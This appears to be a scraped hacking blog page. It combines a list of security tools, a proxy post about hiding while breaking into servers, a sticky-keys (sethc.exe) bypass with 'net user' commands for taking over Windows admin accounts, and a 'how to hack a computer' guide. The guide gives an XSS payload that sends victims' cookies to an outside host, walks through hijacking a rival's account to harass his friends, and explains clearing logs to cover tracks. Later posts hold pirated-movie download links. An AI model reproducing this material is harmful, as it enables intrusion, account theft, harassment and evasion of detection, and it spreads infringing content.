Top 10 Linux Tools

1. nmap - Nmap ("Network Mapper") is a free open source utility for network exploration or security auditing. It was designed to rapidly scan large networks, although it works fine against single hosts. Nmap uses raw IP packets in novel ways to determine what hosts are available on the network, what services (application name and version) those hosts are offering, what operating systems (and OS versions) they are running, what type of packet filters/firewalls are in use, and dozens of other characteristics. Nmap runs on most types of computers and both console and graphical versions are available.

2. Nikto - Nikto is an Open Source (GPL) web server scanner which performs comprehensive tests against web servers for multiple items, including over 3200 potentially dangerous files/CGIs, versions on over 625 servers, and version specific problems on over 230 servers. Scan items and plugins are frequently updated and can be automatically updated (if desired).

3. THC-Amap - Amap is a next-generation tool for assistingnetwork penetration testing. It performs fast and reliable application protocol detection, independant on the TCP/UDP port they are being bound to.

4. Ethereal - Ethereal is used by network professionals around the world for troubleshooting, analysis, software and protocol development, and education. It has all of the standard features you would expect in a protocol analyzer, and several features not seen in any other product.

5. THC-Hydra - Number one of the biggest security holes are passwords, as every password security study shows. Hydra is a parallized login cracker which supports numerous protocols to attack. New modules are easy to add, beside that, it is flexible and very fast.

6. Metasploit Framework - The Metasploit Framework is an advanced open-source platform for developing, testing, and using exploit code. This project initially started off as a portable network game and has evolved into a powerful tool for penetration testing, exploit development, and vulnerability research.

7. John the Ripper - John the Ripper is a fast password cracker, currently available for many flavors of Unix (11 are officially supported, not counting different architectures), DOS, Win32, BeOS, and OpenVMS. Its primary purpose is to detect weak Unix passwords. Besides several crypt(3) password hash types most commonly found on various Unix flavors, supported out of the box are Kerberos AFS and Windows NT/2000/XP/2003 LM hashes, plus several more with contributed patches.

8. Nessus - Nessus is the world's most popular vulnerability scanner used in over 75,000 organisations world-wide. Many of the world's largest organisations are realising significant cost savings by using Nessus to audit business-critical enterprise devices and applications.

9. IRPAS - Internetwork Routing Protocol Attack Suite - Routing protocols are by definition protocols, which are used by routers to communicate with each other about ways to deliver routed protocols, such as IP. While many improvements have been done to the host security since the early days of the Internet, the core of this network still uses unauthenticated services for critical communication.

10. Rainbowcrack - RainbowCrack is a general propose implementation of Philippe Oechslin's faster time-memory trade-off technique. In short, the RainbowCrack tool is a hash cracker. A traditional brute force cracker try all possible plaintexts one by one in cracking time. It is time consuming to break complex password in this way. The idea of time-memory trade-off is to do all cracking time computation in advance and store the result in files so called "rainbow table".

read more “Top 10 Linux Tools”

How to protect yourself from hacker

A proxy, according to merriam-webster.com, is "the agency, function, or office of a deputy who acts as a substitute for another"

In computing, a proxy server is a computer application running on a server that acts as a middle man between you and another server.

To put it simply, you connect to a proxy server, and then you instruct the proxy server to connect to another server, say 127.0.0.1, and to request the page "index.html" from that server, and give it to you. As far as 127.0.0.1, knows, your IP address never visited them, but the proxy's IP address has. This means that 127.0.0.1 will not be able to directly track you.

The upside of using a proxy server is obvious: If you're breaking into a server, or just don't want people to know you have a foot-fetish, a proxy can help by hiding the fact that you visited a certain server. Proxies are also useful for accessing forbidden sites on school and work computers.

The downside is that the proxy server may be logging everything you're doing, which means that not only will they likely give you up as soon as the Feds come knocking, but they can read any unencrypted login details you may have sent through the proxy server.

One solution to the first problem is using a proxy chain. This means that instead of connecting to a proxy and then to your target, you connect to a proxy, which connects to a proxy, etc, and then to your target.

This guide is meant as an introduction to the concept of proxies. By no means should you stop here.

Be sure to check out http://en.wikipedia.org/wiki/Proxy_serveroxy_server
List of Anonymity software.

TOR
Privoxy
Proxifier <--- Very awesome.
FoxyProxy
SMAC 2.0
Forum Proxy Leecher
SocksChain
ProxyChains

read more “How to protect yourself from hacker”

How to crack the vista/ password recovery

If you ever run into the problem where ophcrack, backtrack or similar recovery disks will not work with the architecture and you cant do anything with out the administrator users password then you need to remember this article.

First you need to have an Ubuntu livecd (or bootable flash drive). Got that? good, if not, its free (Ubuntu Download), they will even ship it to you for free (Request Free Copy).

Once you have the livecd, put in the Ubuntu disk and boot that up. Then find the C drive and locate the windows/system32 directory. (Note: if the windows partition is not automatically mounted, you must do it yourself.)

Then remove sethc.exe (but keep it elsewhere because after the crack you have to put it back; a flash drive is useful).

Next, make another copy of cmd.exe in the same directory and name it sethc.exe which is the name of the file you previously moved.

Once done, shut down Ubuntu and fire up Windows. When you get to the login screen hit the shift key 5 times and a command prompt should appear. This command prompt has system rights, as you have not yet logged in. Now type in the following:

net user nameofadminuserhere nameofnewpasswordhere 

Then hit enter. it should give a confirmation of success of some sort. Then pop Ubuntu back in and restore sethc.exe and everything should be back to normal. Then fire up Windows and login with the password you made and the user administrator of the account you changed.

Note that you also can create a new user account and add that account to the administrators group:

net user desiredusername desiredpassword /add
net localgroup administrators desiredusername /add

read more “How to crack the vista/ password recovery”

Complete method to hack a computer

*****How to Hack a Computer*****
Table of Contents

Chapter 1: Preperation.

Chapter 2: Analysis.

Chapter 3: Testing for a vulnerability.

Chapter 4: Exploitation of said vulnerability.

Chapter 5: Covering your tracks.


Disclaimer: I, Stormc1nd3r, take NO RESPONSIBILITY whatsoever for what you do with
the information that is written in this guide, which was written for general matters of interest & legitimate use ONLY!

Preface: This guide assumes you know the basics, e.g. Javascript injections, XSS
cookie exploitation, directory navigation, etc, but need a way to put it all together.

Feel free to post this guide wherever, but please leave a link to HvS/SO. www.securityoverride.com




Chapter 1: Preperation.

First, you need software, all the software listed can be found with a simple Google search.

Cain & Abel
Putty
Nmap
Firefox (Firefox addons are in {.)
{Add N Edit Cookies
Firebug
Live HTTP headers
NoScript
SQL Injections
Tamper Data
URLParams
User Agent Switcher
Web Developer}
Net Tools
Wireshark
TOR
XeroBank Browser
Perl
Python
PHP

If you need more general hacking skills, check out the HvS challenges, as well as w3schools.com.

Chapter 2: Analysis.

All good hacking begins with analysis. Start by doing a scan on your target using Nmap.
Take note of all the information you get, it will be useful. The ports it runs & the OS it uses will be useful when searching for vulnerabilities on the system.
Next, decide what port you want to attack, but make sure you know how the protocol that the port runs works. Once you've connected, try to learn all you can about
the system, usally the server will tell you what software is used to run it, look it up on Milw0rm.com. Try using the "help" command once connected. Check the page source for
forms, directories, clues as to what software the server uses,
for example, a server might use Perl, you could because you would see files or directories
that end in .pl. Make sure to write down EVERY clue you get, what computer languages the server uses, what version of Apache, etc. (try going to www.example.com/images, usally at the bottom
of the page it will tell you what version of Apache it runs.) as stated before, visiting the server on different ports is a good & fast way to pick up clues. If the server has an open FTP server, (port 21)
try logging in as anonymous without entering anything as a password. If you get in, visit the directorie /etc and the sub-directories /group/ and /passwd/ for information on the users on the server.
Make sure to try every port on the site, even if it doesn't seem important, if you connect to the port, it will usally tell you what software it's running, this can often be exploited with a simple Milw0rm.com search. Also, be careful!
Sites often leave honeypots (bait). For example: you connect to a server on port 25 (SMTP), you use the "help" command to see what commands the server allows, you see that the server allows the "debug" command, which you know can often be exploited, so you run the command, and get kicked off the server,
and get IP banned.


Chapter 3: Testing for an exploit.

Once you have found a good clue which you think will be useful in hacking into the server, you should generally test it out before searching around more. Here's an attack scenario: Tom's rival, Huck, recently made an account on an online social networking site. Tom wants to log in as Huck, and send rude pms to Huck's friends.
He then goes of the server with a proverbeal fine-toothed comb. He notices that there's a form that is used to send other users messages. Tom decides to check to see
if the form is vulnerable to XSS attacks. To test it out, he sends himself a message with a basic script in it the script reads: alert("BOO!").
When he opens the message, a Javascript alert reading "BOO!" pops up. Tom now knows that it IS indeed vulnerable to XSS attacks. He sends Huck a Message with the following script in it:document.location="http://bla.com/cookie.php?c=" + document.cookie
When Huck opens the message, he sends him to a location on Tom's server which contains a PHP script, which steals Huck's cookies, and redirects Huck to a different site. Tom uses
Javascript to change his cookies to match Huck's, which effectively logs him in AS Huck. He then sends hateful messages to Huck's friends, strongly damaging his personal life. This is only a basic example, but it
shows how critical research is. Here's another example, in which a tiny sliver on information leads to the downfall of the server: you find out that the server you want
destroyed, defaced, pillages, haxxored, or otherwise illegaly abused, uses Apache 1.2.3. You go to Milw0rm.com and search "Apache 1.2.3". You find an article containing how to exploit that version of Apache
to login as an administrator. You launch the exploit & get in. See the difference made by the tiny shard of information?
Basicly, if you find something interesting on a site, be it possibly exploitable software, a shoutbox, or a possibly XSS vulnerable form, you need to do research on it to see if it can be used for your own benefit. Sometimes you can test this yourself, like in the above example,
but often you won't know how to exploit what the server is running (like say your clue is subtle, like the version of Apache the server runs), you can try a Google search,
like say "Apache 1.1.12 exploit". Or you can try searching on a security-based site like securityfocus.com or Milw0rm.com.

List of items to check for on every server.
- Ports.
- Source of all critical looking pages, if site is small, then every page.
- Check the at cookies different times on the site. While logged in, while logged out, etc.
- Check the headers of the important pages on the site.
- If you find a directory list, be sure to look around well, and try default password directories.
- Try searching a feature you find on the site on Milw0rm. For example, if the site uses PHP, look for PHP exploits. (This goes for other languages too.)
- Try typing the website url into your browser, but instead of http:// use ftp://. If asked for a username & password, use this: Username:anonymous Passoword:

Chapter 4: Exploiting the vulnerability.

This is going to be a short chapter this the actual exploitment is pretty straightfoward
once you've found the vulnerability. Just use the attack you researched on the site, and be quick about it.
Make your plans for what you'll do when you've exploited the vulnerability before you break in.

Chapter 5: Covering your tracks.

There are many ways to avoid getting caught, even if you have permission,
you might want to do this just to prove that you know what you're doing. If you're a student, you might be required to do this to pass. Generally, the
best way to cover your tracks is never to have left them. Download XeroBank,http://xerobank.com/, (Firefox with built-in TOR),
or use a web based proxy, if you choose the latter, I recommend hvs.php-invent.com/prox. The user is hvs, the pass is proxy.
But if you DID leave tracks, then look around the server for logs, if you gained admin privledges it should
be no problem to clear them. URL Params for Firefox is a useful tool for log clearing. If you find a "clear logs" button, but it doesn't work, check your cookies for something
along the lines of "authorized" or "admin" and change the value to 1. You can also try injecting the logs command with Javascript, or trick someone who can into doing it.
Also, formatting the C: drive should do the trick, but I don't think your prof. will be too happy about it.

read more “Complete method to hack a computer”

how to make a secure password

Does the password s4.pUd53!ppie8 seem impossible to remember? It really isn't. And it's easy to make this kind of secure password in a matter of seconds!


How we arrive at s4.pUd53!ppie8:

First we have sadpuppy. Let's replace the a with a 4.

Now we have s4dpuppy. How about mixing a character around? s4dpuppy changes to s4pudppy. We just moved the d over 2 spots.

How about we change the y to an ie? Now we have s4pudppie. Now we throw in some random (or not so random) numbers.

How about something easy? Throw in 5, 3, and 8 into s4pdudppie. 5 + 3 = 8 if you forget. We now have s4pudppie538.

Mix those numbers into s4pudppie - s4pud53ppie8 is our new password. You can also throw in a certain year as the numbers.

At the end of the two numbers, we'll add something - ! - so now we have s4pud53!ppie8

Almost done! Let's throw in a period as the first letter of the second word begins. s4.pud53!ppie8 - let's add an uppercase letter (the U) for added security.

s4.pUd53!ppie8

We now have a secure password.


How about we do something like that with the infamous password of password?

How can we make it secure?

Making "password" secure:

password -> p4ssw0rd -> p4w0srds -> p4w0srdz -> p4w0sr#d$z -> p4w0sR#d$z -> p4w0.sR#d$z


p4w0.sR#d$z seems pretty secure, don't you think?


Remembering the password..

Once you have made your secure password you must remember it. The point of starting with a phrase such as sadpuppy is to help you remember it.

Look at it on your computer screen. Take out a piece of paper (don't do this on your keyboard). Write it down once.

Write it down about 15 times. THEN go to your keyboard on your computer and see if you remember it (type it in).


Change some of your regularly used passwords to it and maybe some not so regularly used passwords to it. But don't change all your passwords to it!


For your email, paypal, etc passwords, you want to make a completely different password, or further edited secure password (that is, add a few special characters to your normal password).


This will allow you to have a very secure password and be able to remember it.



Please realize that there is no formula here. You just change characters around and substitute or add others.

If you have cool as your password, you don't have to (and shouldn't) change both o's to 0's - only one.

You can change a lot of letters to numbers or special characters and vise versa including:

a -> 4
B -> 8
e -> 3
i -> 1
l -> 1
o -> 0
s -> 5

a -> @
s -> $
1 -> !
x -> %

They aren't hard to come up with. These are just a few. There are tons more.
Anything you can remember will work.

Some sites don't allow special characters in the password, including this site, so you have to compromise. You can take out the characters completely, or replace them with numbers.


The key to making secure passwords is all about being inconsistent.

read more “how to make a secure password”

Asylum 2009 DVDRip XviD-VoMiT

CLICK ON


Genre: Action
Release Date: 5 March 2009 (USA)
Director: Jeff Crook & Josh Crook
Runtime: 90 min
Ratings: IMDB: 5.6/10 (130 votes ) | RT


Asylum.2009.DVDRip.XviD-VoMiT
1CD | 727.50MB | vmt-asylm-xvid
Quality: XViD 608×336@850kb/s | MP3 160kb/s VBR
Subtitles: None



Synopsis: The truth will set you free. This is what Eddie is told as he sits bloody and battered, chained to a chair. But all he can tell them is what happened. The Level follows Eddie, a smooth mob enforcer, as he and his hair-trigger partner, Rocky, search for their boss, Al, a mob kingpin.

http://netload.in/dateiwyX59G0DEx/vmt-asylum-xvid.part1.rar.htm
http://netload.in/datein8Tbpzskd2/vmt-asylum-xvid.part2.rar.htm

SFV:
http://netload.in/dateiq45KJmGtUk/vmt-asylum-xvid.sfv.htm
OR
http://rapidshare.com/files/344086715/Asylum.2009.DVDRip.XviD-VoMiT.part1.rar
http://rapidshare.com/files/344086692/Asylum.2009.DVDRip.XviD-VoMiT.part2.rar
http://rapidshare.com/files/344085941/Asylum.2009.DVDRip.XviD-VoMiT.part3.rar
http://rapidshare.com/files/344087030/Asylum.2009.DVDRip.XviD-VoMiT.part4.rar
OR
http://hotfile.com/dl/26622320/4240dcb/vmt-asylum-xvid.part1.rar.html
http://hotfile.com/dl/26622386/6fbe8a9/vmt-asylum-xvid.part2.rar.html
http://hotfile.com/dl/26622321/cbfa4a1/vmt-asylum-xvid.part3.rar.html
http://hotfile.com/dl/26622373/f0379c4/vmt-asylum-xvid.part4.rar.html
OR
http://www.megaupload.com/?d=XASGFM5L

read more “Asylum 2009 DVDRip XviD-VoMiT”

Free Style 2008 DVDRip XviD-VoMiT

CLICK ON


Genre : Drama

Tagline : It's Time To Soar.

Plot : Cale Bryant is determined to win a coveted spot on the Grand National motocross racing team. With the support of his loving mother, precocious little sister and new girlfriend, Cale proves against all odds that he has the heart, the willpower and the courage never to give up on his dream.




Free Style (2008)

Video Codec....: XviD-1.2.2
Video Bitrate..: 850 kbps
Audio Codec....: MP3 VBR Stereo
Audio Bitrate..: 160 kbps
Aspect Ratio...: 1.81:1
Resolution.....: 640 x 352
Frame Rate.....: 23.976 fps
Genre..........: Drama
Runtime........: 94 mins
RAR Count......: 50x15
Audio Language.: English
Subtitles......: N/A
DVD Date.......: 02.09.2010
Release Date...: 02.01.2010
Theater Date...: 12.24.2008
IMDB Rating....: 3.5/10 (104 votes)

http://netload.in/datei8uNmPqbq2j/vmt-fstyle-xvid.part1.rar.htm
http://netload.in/dateiTDm909k4mh/vmt-fstyle-xvid.part2.rar.htm

SFV:
http://netload.in/dateihsVpOE9bkR/vmt-fstyle-xvid.sfv.htm

read more “Free Style 2008 DVDRip XviD-VoMiT”

Aching Hearts 2009 DVDRip XviD-LAP

CLICK ON


INFO : http://www.imdb.com/title/tt1087861/
IMDB Rating: 7.0/10 146 votes



PLOT :

A bunch of 15-year-olds in Viborg make their first experiences with love, kissing and sexuality, coming together and drifting apart. The film follows the adolescents over a three-year-period, focusing on the relationship between Jonas and Agnete, which is made difficult by misconceptions, Agnete's interest for philosophy and Jonas's friend Toke, her father's mental illness and Jonas's own indecision regarding his feelings for her. The story ends when the protagonists finish school.

Size: 708 MB
Genre: Drama
IMDB Rating: 7.0/10 146 votes
IMDB Link : Click here
Directed By: Nils Malmros
Starring: Anni Bjшrn, Ida Dwinger

http://netload.in/datei2QxNv9GNKF/lap-achrts.part1.rar.htm
http://netload.in/dateiiTDZnCQa6W/lap-achrts.part2.rar.htm

SFV:
http://netload.in/datein58NEL7VWu/lap-achrts.sfv.htm

read more “Aching Hearts 2009 DVDRip XviD-LAP”

Me and You Us Forever 2008 LiMiTED DVDRip XviD-LPD

CLICK ON

Genre: Drama / Romance
Release Date: 15 February 2008 (USA)
Director: Dave Christiano
Runtime: 101min
Ratings: IMDB: 3.5/10 (71 votes ) | RT: N/A (1 votes)


Me.and.You.Us.Forever.2008.LiMiTED.DVDRip.XviD-LPD
1CD | 704.8MB | meayuf.xvid-lpd
Quality: XViD 624×352@801kb/s | MP3 151kb/s VBR


This sweet, simple story finds a middle-aged Christian man (Michael Blain-Rozgay) reminiscing about his first love after his divorce. Though it’s been three decades since they broke up, he wants to do everything he can to see his high school sweetheart. Bouncing between 1974 and 2004, ME & YOU, US, FOREVER paints a beautiful picture of young romance and its lasting effects. Writer-director-producer Dave Christiano based this film on his own experience with first love.

http://netload.in/dateiZAuxrky6Ei/meayuf.xvid-lpd.part1.rar.htm
http://netload.in/dateiLFQzfHMK6W/meayuf.xvid-lpd.part2.rar.htm

SFV:
http://netload.in/dateiA5LQB9O4fq/meayuf.xvid-lpd.sfv.htm
or
http://rapidshare.com/files/342567583/Me.and.You.Us.Forever.2008.LiMiTED.DVDRip.XviD-LPD.part1.rar
http://rapidshare.com/files/342568465/Me.and.You.Us.Forever.2008.LiMiTED.DVDRip.XviD-LPD.part2.rar
http://rapidshare.com/files/342568930/Me.and.You.Us.Forever.2008.LiMiTED.DVDRip.XviD-LPD.part3.rar
http://rapidshare.com/files/342569065/Me.and.You.Us.Forever.2008.LiMiTED.DVDRip.XviD-LPD.part4.rar

read more “Me and You Us Forever 2008 LiMiTED DVDRip XviD-LPD”

Dantes Inferno Animated 2010 BDRip XviD-ESPiSE

CLICK ON


Dantes Inferno Animated (2010) BDRip XviD-ESPiSE
English | 01:28:08 | AVI XViD 608×336 973 kbps | Mp3 128 kbps 48khz | 699 MB
Genre: Animation
IMDB Info
Directed by: Boris Acosta
Cast: Jeff Conaway, Dino Di Durante, Silvia Colloca


Dante’s Inferno: An Animated Epic will take you on a harrowing trip through Hell as Dante braves the forces of evil, slaying demons and monsters of extraordinary imagination, all to save his love Beatrice, from the clutches of Hell’s master – Lucifer. The companion piece to the hit Electronic Arts game, Dante’s Inferno: An Animated Epic, is inventively told through eyes of visionary animation directors from around the world, including Shuko Murase (Ergo Proxy) and Yasoumi Umetsu (Kite: Liberator) among others.

http://netload.in/dateiiOO8XOhiwS/espise-xvid-dantes.part1.rar.htm
http://netload.in/dateinDovWRQwb9/espise-xvid-dantes.part2.rar.htm

SFV:
http://netload.in/datei7sWraD8lib/espise-xvid-dantes.sfv.htm
or
http://hotfile.com/dl/26154946/39f7fd4/sobisvn_espise_dantes.part1.rar.html
http://hotfile.com/dl/26154943/b14ed66/sobisvn_espise_dantes.part2.rar.html
http://hotfile.com/dl/26154944/0cf53c3/sobisvn_espise_dantes.part3.rar.html
http://hotfile.com/dl/26154945/cb03df3/sobisvn_espise_dantes.part4.rar.html

filefactory
http://www.filefactory.com/file/a2gac3g/n/sobisvn_espise_dantes.part4.rar
http://www.filefactory.com/file/a2gac3f/n/sobisvn_espise_dantes.part3.rar
http://www.filefactory.com/file/a2gac20/n/sobisvn_espise_dantes.part2.rar
http://www.filefactory.com/file/a2gacdd/n/sobisvn_espise_dantes.part1.rar

read more “Dantes Inferno Animated 2010 BDRip XviD-ESPiSE”